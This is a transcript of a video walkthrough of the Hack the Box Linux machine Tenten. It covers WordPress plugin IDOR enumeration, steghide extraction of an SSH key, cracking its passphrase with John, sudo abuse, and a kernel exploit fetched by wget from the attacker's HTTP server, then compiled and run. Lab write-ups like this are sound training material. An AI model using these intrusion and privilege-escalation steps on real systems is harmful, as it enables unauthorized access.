Hey guys, HackerSploit here, back again with another video, and welcome back to the Hack the Box walkthrough series. In this video, we'll be taking a look at Tenten, which is a Linux box, and the reason I'm taking a look at it specifically is because it looks like a very well balanced box. So it has a balance between enumeration, a CTF-like box, and of course CVE, which again is something I know many of you guys stay away from. But the reason I like Linux boxes is because you mainly or primarily are not using Metasploit as much, and everything comes down to custom exploitation. As you can see, there's also quite a focus on that. That being said, let's get started. So I already have the nmap results here, just to save time. So nmap, we'll just say nmap default.txt. And you can take a look at my scan options right over here. So I scanned all ports, and you can see we have very interesting information. So we have two ports or two services open. We have SSH, and the service version running is OpenSSH 7.2 P2, and it tells us running Ubuntu, right? So we already have an idea of the operating system we're dealing with. We then have a web server running Apache HTTPD 2.4.18, and that's running Ubuntu. And the HTTP generator tells us we're running WordPress 4.7.3, which is quite outdated. We then have the header, which is telling us it's running Apache 2.4.18, which is interesting. That points towards the fact that we might have some directory listing. And then the HTTP title tells us we have the title of the website, which is Job Portal. And it tells us this is just another WordPress website. And as for the operating system scan results, it tells us, we're dealing with something that has a kernel between 3.10 and 4.11. So we're probably dealing with Ubuntu 18.04 and lower if we're running Ubuntu, which in this case, I'm guessing we are. So that's my guess regarding the version of Ubuntu running. Now that we know we have a web server running, let's check that out. And we'll also run a quick search exploit on OpenSSH. So search exploit OpenSSH 7.2. And this is P2. Okay, so we have username enumeration, and these are all Python scripts. So we'll take a look at this in a second. Now, if we are running WordPress, there should be a lot of good information disclosure. So we can see it's just a simple WordPress site set up, and it has one post. So let's take a look at this post. It's just a simple hello world post. And okay, so we have a user. We've already found our first bit of information. So I'm just going to log that down. So our user is Takis. And whenever you're dealing with WordPress, the user is very important, because we can then potentially brute force into the admin panel. And given that this box is CTF based, that might be the case. However, there isn't any post here that we can then use. So this has a random reply, which is set up by WordPress. The interesting thing is it's telling us archives are from 2017. So if we just try and access the robots.txt page, because that's probably why it's giving we were able to get the Apache banner. So directory listing may be enabled. We can actually test that out right now. So if we say WordPress content, uploads, and okay, yeah, so we currently don't have permission for this directory, but this is a good sign, because again, even though we don't have permission, we're getting there is a bit of indexing regarding the indexes. So we'll probably have to take a look at that right now. So now that we've actually gone through that, let's run a quick WordPress scan on this, because WordPress scan will give us, the important information we're looking for. So WordPress scan, by the way, with the new version of WordPress scan, you actually need to specify, or you need to provide an API, and the API in question is the vulndb API. If I just look for the option, it should be here, the API token. So if you want vulnerability information regarding specific vulnerabilities and how to exploit them, and their disclosures, that's what I meant, you need to get your WordPress vulndb API token. So this is just a database of WordPress vulnerabilities, from plugins and themes. Really cool site. So you can get a free API, and it's excellent. I think it gives you about 50 free requests per day. So WordPress scan, URL, and that is http 10 and enumerate. We want to enumerate vulnerable plugins first, right? So we'll run that, and let's just go back to this here. So this is a simple site. We have job listings. Let's see what that's about. Okay, so it looks like we have a job listing for pen tester. The salary is 1500 and no currency given there. Start date, end date, and the location. We can also apply now. So if we apply now, we have URL with apply, and we just get rid of that. Let's see what that displays. So that just takes us to our job application. And when we add the option 8, it looks like there are various job application pages. So let's try if we have job application page 1. So that says hello world. Yeah, so this is pretty cool. We can actually access these job application pages. So if we go back to our page 8, which is telling us that's pen tester, let's see. I think we can brute force this with let's see what other pages we get. We pretty much, I think we can access all of them. Let's try 10. So that's just called application. Yeah, so let's try and brute force this with Burp Suite. We can actually just replace, we can use that as our variable to change. If we go back and we take a look at the WordPress scan results, we can see we have one plugin identified with a vulnerability, and that is the Job Manager plugin. That's ironic since the website is a job application site. So that says the location is WordPress Content Plugins Job Manager. And I think that's the plugin we're using right now. So that allows you to specify your applications, right? Job applications. And the vulnerability type is of insecure direct object reference, which I think is a form of insecure access or authentication bypass, where you can access. I think we've already exploited it, if I'm not wrong, because I was able to go through all the applications. So let's just take a look at the information from the WordPress vulndb. Let's paste that in there, and this is the website where you can get the API. So it's insecure direct object reference. So this is a auth bypass, yes. So, and this falls under A2 under the OWASP top 10s, which is broken authentication and session management. And it's publicly published on 2015. And do we have a link we can access? So let's try and see. This is the disclosure URL, and this looks like a POC of sorts. Okay, so the description, it's possible to enumerate the CV file name. So the CV file name, if we scroll to the bottom, it looks, yeah, we can upload a CV. So we can, this is regarding brute forcing the CV file name. So the CV file by performing a brute force attack to the WordPress upload directory structure. Okay, so if that's the case, then I think we should perform we should actually run a Derebuster instance here, going through all the directories, if that's going to be important, because that will pretty much do it for us. But let's see, we can actually read through this vulnerability. So user share word list, and I'll just use Derebuster and directory list 2.3 medium and hit start. Let that run. So going back to the vulnerability, the impact CVs contain sensitive data such as telephones, home addresses, etc. So I'm guessing this vulnerability allows you to access these CVs or these files submitted through those applications under the WordPress content uploads directory, because that's what it's referring to. So you upload a CV, in this case it's a PDF file, and then SQL listed out. All right, so it's listing out his posts, and the file name here was vagmorcv.pdf, and there we are. So we can see it uploads it under the WordPress content uploads 2015. That's the year it submitted, the month 08, and vagmorcv PDF. So we can actually get these files being uploaded from these particular forms. Now the file name is what we need to actually try and enumerate now. So we've tried to access all of them, and perhaps we need to perform a brute force on this. So he set his content to private, and I think that's what's happening here. So we can abuse the WordPress post representation. Okay, so yeah, this is what we need to do. So we need to use Burp Suite. So I'm just going to enable Burp Suite here, and if we take a look at the, let me just cancel that regex request. If we take a look at the directories here, you can see that most of the content is from 2017. So that gives us a good idea already as to where these files are being uploaded. But let's try and find the page or the application page where this is being uploaded from. Or what we can do is we can try and upload a file here. So let's first of all run this in Burp first, because I actually want to see what the responses are, if there's any pages that we don't have access to. So I'll open up Burp Suite, and let's see what we can do here. So this is the community edition. Many of you tell me to use Zap, but in this case let me just use Burp Suite, and because it's much simpler to explain what I'm doing. All right, do I have the intercept set on? Yes. Do we have the Burp Suite? All right, so I'm just going to reload that, and let's go into Burp Suite, and let's just capture that request. So this is our parameter here, the value 10. So that is the application page. So we will send this to the intruder for a brute force. We'll go intruder positions. The position, do we have anything marked? No. So we want to change this value here. We're going to add that, and we'll use the sniper. Payload set 1. Yeah, that's only one payload set. The payload type, that's going to be a number. Yeah, we have numbers. The number range is sequential from, let's see, we have from 1 to 15. Let's try that. That's nice. And then the step is 1. And yeah, that's fine. We have payload encoding as well. So we'll start the attack. And let's see the status codes, the responses we get. So that's already attacking. And let me just pause there, Buster. That's causing quite a ruckus here. So there we are. The requests are much faster now. And we're all getting 200 responses, which means they all exist. So let's take a look at the responses here, because we are only getting, these generic ones. So job application 1, 2, so on and so forth. So let's see. The response here, let's look for the title. So the title is job application hello world. It's job application sample page, auto draft, job portal, job listing, same thing, register. Oh, hold on, register application, register. Oh yeah, that's just the same. Pen tester, so that's on number 8. That's the one it took us to, right? So that's the pen tester role. Number 10, number 11, that's cube. Okay, so that's cube. We have cube on 11, 12, 13. Oh, hold on. On 13, we have application page for hacker access granted. Okay, so let's try that out. So I'm just going to minimize this, and we're going to the proxy, disable that, and let's turn off burp, and let's test that out. So this is under 13, right? So that's under 13, and the title is hacker access granted. All right, so anyway, I think we can try and upload a file here. Let's just take a look at what. So we get the responses. In his case, he's all getting 301s, which mean those are set to private. So it tells us we learned the private link, but the URL is not normalized as lowercase. In any case, this whole vulnerability is based on the fact that you can access the CVs from the WordPress content directory under uploads. But how do we do that? We probably need to do that manually. We know that it's under 2017 and under the year that you've uploaded your CV. However, we can try and access and see whether any files have been uploaded from the year 2017. And so yeah, it's telling us the most difficult thing of this structure is the file name. Only the file name can be brute forced. Okay, all right, so that's where we'll have an issue. Since we have that knowledge, we can brute force. Well, the file name was Vagmo. In this case, there is no file, but we can test this hypothesis out. So there is a brute force script that allows us to enumerate the WordPress upload directory so that we can find that file. So it looks like there is a file here. So what I'll do is let me just try and download a simple, like a test file. Let's see. can I look for, let's just download a quick image. So I'll say Pepe. Let's just download an image of Pepe the frog, right? Yeah, there we are. Let's just download this one. This is nice and big, right? So this is a JPEG file. So we'll save it under Documents, HackTheBox, and under Tenten, and save that. All right, so that's a JPEG file. And now we can try and upload it as our CV if it will allow that. So let's see if we can actually upload any type of file. So Alexis, I'll just type in my surname there and my email, alexis@test.com. I don't need to provide the rest of the information. Let's upload that file. So pepe.jpg, yes, I've understood. Submit the application, and it submits. Okay, cool. So that means now that if we go into HTTP 10 and WordPress content, that's important, and we specify the year we have uploaded it, so it's 2020. The month is June, so that's 06. Hit enter. So it says that's not found. Oh yeah, we need to specify uploads. Yes, I forgot about that. So uploads, and that says you don't have permission. But if we specify the file, because the directory listing is disabled in uploads, I believe, if we say pepe.jpg, what was the name of the file we downloaded? It's index.jpg. Sorry, that's the name. So that is index.jpg. That's not saved there. Let's take a look at this here. So I don't know whether that file is loading. Let's just look for another image. Let's say pepe dot, or let's just look for PDF templates. Let's try PDF. Maybe that's why it's not working. So I'll just download a sample PDF template here. And I really want to get this done quickly. So this is a contract. So use this template. Can I download this? No, this is taking us into PDF editor. Everything's done online now. Can't even download them. Yeah, can I download this? This is a blank order. Yeah, download now. Oh, wow, man, this is all right. So I'll just download this PDF. Continue downloading. All right, do I have the PDF file? Okay, cool. I have the PDF file. So I will just copy, or just let me just change the file name. So move downloads. We have the file name is blank order. So I'll just call this cv.pdf, right? And we'll go back here and we'll try and upload it. So we'll go back into the this one right over here, hacker access granted. So I uploaded it as pepe.jpg. All right, yeah. So that's probably why it wasn't loading. That's what I was wondering, man. So pepe.jpg. Oh my god, I can't even spell Pepe, man. That's and there we are. All right, so we know that that's working now. So we know through Dirbuster that the directory where we're getting the most is 2017 and in April. And we know that the files are stored right over here. So there was this brute force script right here that we specify a website, enter file name. So the file name is probably what we need to get now, but we can in this case it's telling us hacker access granted, so we can try that as the file name. And it says we have a range of years, and for the month it's 1 to 13, so that's January to December. The extensions are specified here as PDF. Okay, so yeah, we can probably take this script and then, you know, modify it a little bit to meet our parameters. So vim, we'll just call it root.py, and this is, I think, Python 2. Let me just check that. Yeah, this is Python 2. So we'll change the year first of all, cause the year range. So if we say, let's just start off with 2017, and we'll say, yeah, January to, maybe let's change it to June, because I just want to limit the parameters here. For extension in, we can add a few more extensions just in the event we have any other extensions. So we'll add JPEG, We'll add a JPG. Yeah, we can add a JPG, I believe. So JPG. We can also add PNG, but let's try this out first. So URL of, instead of CV, we can just say URL of file found, write that, and say Python. Let's see, how do we use this script? So it's brute.py, right? And it says enter a vulnerable website. Let's take a look at the usage. Do we have the usage here? So it tells us specify the URL and the WordPress installation directory. And okay, so we just need to specify the URL. So 10. File name will just say hacker access granted. That's the name of this application page. However, yeah, this is the title anyway. So let's just try that out. Let's see if that works. In the meantime, we can try it manually. I don't want to brute force it myself. So we'll just say WordPress content uploads, change this to 2017. We know that that is the directory. And that is 04. And let's see if this is giving us any results yet. If we take a look at the write-up, it gives him the directory of the CV, which is in this case PDF. And given this, he can then use Burp Suite to retrieve all the uploaded, CVs on the site, which is, in this case, it's just in, this is more particular to getting, important information. In our case, we're really not trying to expose CVs, but trying to find a file here. So we know that what our test worked. Let's see if this has responded with anything. So in the meantime, let's try it manually. So we can say hacker, because that's the title name. So hacker access granted, hacker access granted .pdf. Not found. Let's try docx. Let's see, PNG, JPEG, JPG, and okay, so we get an image. So this is the access granted, right? So we get an image now. This is still under that 2017 directory. Did we get a result from here? So it's still brute forcing, I think. So let's save this image, and we'll save it under HackTheBox and Tenten and save it. So it's called hacker access granted.jpg. We had the other pages. Let's see if there are any other pages we can see the response. So 14 and 15 is the same job application portal. So I think that's the information we get, but I don't know what we're supposed to do with this. So I'll let that run on its own, and let me just open up bash here. So cd documents, HackTheBox, and Tenten. cv.pdf, that was the file we get. Hacker access granted.jpg. What file type is this? What am I doing? So that's the file hacker access granted. That is a JPG file. Let's see if this file has been, if there's anything hidden. So it's components. Let's see if there's any steganography that's been done on the image. Documents, HackTheBox, Tenten, hacker access granted. Let's just look at the properties here. Yeah, so it doesn't give us anything important. So let's try and use StegHide. StegHide, how do we use StegHide? So to extract embedded data from steg.jpg, use StegHide extract sfs and the image. So let's try that. StegHide extract StegHide extract sf and hacker access granted.jpg. Enter a passphrase. Let's try no passphrase, and we get some data that's been extracted. All right, cool. So we get ID RSA. Okay, so that first of all, let's just see the contents of this, because if we can use this to log in via SSH, sorry, cat ID RSA. So this is our private key and this has been encrypted. Okay, so we got the user, we got a user called Take. So we now have a user, we now have an SSH key, which looks like a potential access vector here, but it's encrypted. So to decrypt this, we can use John. So we can say, yeah, we're reversing SSH to John. So we say SSH to John, and then we specify the file, which is ID RSA. So we hit enter, and yes, this gives us a hash. And this is of type 1. This is a Linux hash, which means if we decrypt this, we'll probably get a password that we can then use with SSH, I think, or with the WordPress admin. Okay, so this is or type 1, which means it's probably MD5. So if we say John, word list, and this is user share, sorry, that is word list equal user share word list, and that is rocku.txt. And well, we need to output the file, right? So let me just output the file. So say bash, we'll say ssh ssh to John. We say ID RSA. We're not in that directory, so cd documents, HackTheBox, Tenten. So we say let's say ssh to John, and we can output it, I believe. So ID, let's output it into just a file called password.hash. There we are. So we can now exit from this, exit, and now we can use this. So we say password.hash. So we can use we can use John. So well, user share word list, was that giving us an error regarding the is it word lists? I believe, is it word list or word lists? Let's hit enter, and yeah, we get a password. The password is called super password. So first things first, let's see if we can log in. So WordPress admin, and then we try SSH, but let's see. So we have Takis, there we are, Takis, and we can, no, sorry, that is super password. Let's try and log in. That's not working. Okay, so let's try it via SSH. So now that we've got the password, so we say SSH Takis at 10 super password, anything, and that's telling us nothing. So yeah, oh, my mistake, we need to use SSH ID RSA Takis at 10 and oh yeah, we need to, do we need to change super password? Do we need to change the file ID? I'm sorry, the permission. So chmod 0400 ID RSA, on the previous one. So super password, and there we are. So we now have access to Takis, and let's see. So we currently, I think we can access the we probably need to perform some enumeration first of all. So cat etc issue, we can see, yeah, so I was actually raised Ubuntu 16.04 excuse me 0.2 LTS. I would say uname R, that's running 4.4 version 4.4. I'm not really sure we have exploits for that, but well, you know, we can perform privilege escalation. We have the user flag, so user.txt, that's done. We now need the root flag. Let's try and perform some enumeration now. So sudo, let's see what we can execute here. Sudo L, and we can run the following commands on Tenten. We can run bin fucking, all right, so pardon my French there. So let's try and run that. Let's see what we get. So sudo bin fucking, hit enter. ID still, so yeah, that didn't do anything. Can we use this to access files within the root directory? Cd root, sorry about that. So cd root, sorry, that's a bit stupid. Let's say cat root root.txt. Yeah, so yeah, we can immediately get root, but this allows us to perform system commands. This allows us to perform system commands or to run, administrative what's it called? Commands, or to perform commands with administrator privileges, right? So that being said, now we need to perform some privilege escalation. We can probably use the same command to do what we need to do. So what I'm going to do now is we can probably, to do this, well, we can just say, we can just get a shell session. I think we'll be able to get root, but then I would like to also elevate the privileges. So we can say sudo, so sudo bin, this is the binary. By the way, I want to access and see what the binary does, and then we can say bin bash, and we get root. So that, yeah, that was fairly simple. Let's cat bin, yeah, so yeah, it essentially allows us to execute root commands using this binary. So yeah, that was fairly simple. Quite disappointing. I think there is a way we can perform some privilege escalation. So let's try and search for, we can use the Linux exploit suggester. Let's try and do that ourselves, right? So Linux exploit suggester, we'll use version 1. I really like version 1. It's been very effective for me. So we'll just get the raw content here. Oh, we actually have the command there. Forgot about that. Can we get it directly through the internet? Let's see if we have the ability. Sorry about that. Let's just paste that in there. Yeah, so that's not working. If I go back here, that's still running for some reason, the script, the Python script. So I will just use a simple HTTP server. So bash with Python. So cd documents, HackTheBox, and we say Tenten, and we can just get the script ourselves. And I'll just change the name. So yeah, it's less.sh. I'll just change it to enum.sh, and we'll say Python m simple HTTP server. Sorry, that is simple HTTP server, and we'll just leave it at port 80, right, and hit enter. Probably need to run this with privileges. So there we are. It's now if I say, so ifconfig, let's look for my my IP address through my tunnel 0 interface, which is 10.10.14.29. So http 10.10.14.29 enum.sh. So let's use that right now. So we have SSH there. So we go back into session 2. So wget http 10.10.14.29 enum.sh. Let's see whether that works. There we are, that works. So again, we say chmod. We can just remove less.sh. That probably doesn't have anything. So chmod plus x enum.sh, enum.sh, and let's see what we get. All right, cool. So it looks like we have a few options here. So just try and scroll to the top, and let's see what we have here. So looks like we have a few some more specifically tuned towards what you would say is I don't know, what would you call it, Ubuntu. So let's just take a look at the exploits here. Exploit DB, we have the first option, which is if I can just take a look at it, let me just scroll to the top here. The first option that we have, sorry about that, is EBF verifier, and that works on 16.04, 17.04. That is highly probable. They all are highly probable. So let's start off with this one. Let's take a look at how this works here. We can actually open up the exploit DB here. Copy link address. Let's open that up. By the way, I can close the PDF template page, although that was useful. So that's a C file. No, I want to actually check out the vulnerability before I start playing around with it. So let's copy that URL. That looks like a disclosure URL. So copy link address and paste and go. All right. So one of the best and worst Linux kernel vulnerabilities of all time. Vulnerability allows for arbitrary read-write access to the Linux kernel bypassing SMEP, and the vulnerability is possible to bypass the BPF verifier, verify.c, load BPF code, and read-write primitive. The root cause of the vulnerability is improper arithmetic sign. So this looks like a kernel exploit. So we can actually just test this out and let's see whether that works. So I'll just get this. So copy link address, and probably have to get it on my local system here. And we'll just say, and so this is probably going to get the C file. So .c, sorry about that. Home, there we are. Not found. Interesting. Let me just paste that and go. Let's see if we can get it. So I'll just save it and move. And we're going to get to the downloads folder, and we're looking for 4501.c documents, HackTheBox, and we're in 1010, right? So copy that there. So Vim, let's see if we have any instructions on how to compile this exploit. So cd documents, sorry, HackTheBox, and try 1010, say Vim 4501.c. So this will work. This is a kernel exploit, so this will work on Ubuntu 16.04 with the following kernels: 4.4. Yeah, so this will work on our system and also on Fedora. Okay, so to compile it, GCC, specify the file and output it. Right, so we can do that. So I think we'll compile it on the target box. So I'll just rename this to exploit.c, and we can now retrieve that. So we'll go back into the second one right over here, and let's see if we can just pull that. So we're looking for exploit.c, and there we are. We can say gcc exploit.c output exploit, right, and chmod plus x exploit, and let's see if we can get root now through privilege escalation and bash, and there we are. So we're able to get root, and cat root that's cat root, my home directory here, cd, there we are. So cat, well, I'm actually, this is not in the root directory. Well, that's weird. Print my working directory, so cd root, there we are, and cat root.txt, and we get the root flag, and we're able to successfully perform privilege escalation without the use of the fucking binary, as it's called. That's not my word, that's the name of the binary that allows us to execute commands. I've covered this with the sudo bypass vulnerability, which was slightly different, but essentially allowed you to do the same thing or allowed an unprivileged user to do the same thing, to actually execute commands as the root user. So yeah, that's it for this box. Pretty interesting box. Covered a lot of important aspects of enumeration, and I would say this is more enum and custom exploitation, because I really didn't get anything CTF-ish from this box, even though most of the things had to do with finding important things like users, like Takis, and then decrypting the SSH password and then using it that way. So yeah, that was pretty simple. Let me know what you guys think in the comment section. I would love to hear your your feedback and what you thought I should have done differently, or if you guys have done the box, you can send me whatever you thought, your means of going through it. And yeah, that's going to be it for this video, and I'll be seeing you in the next video.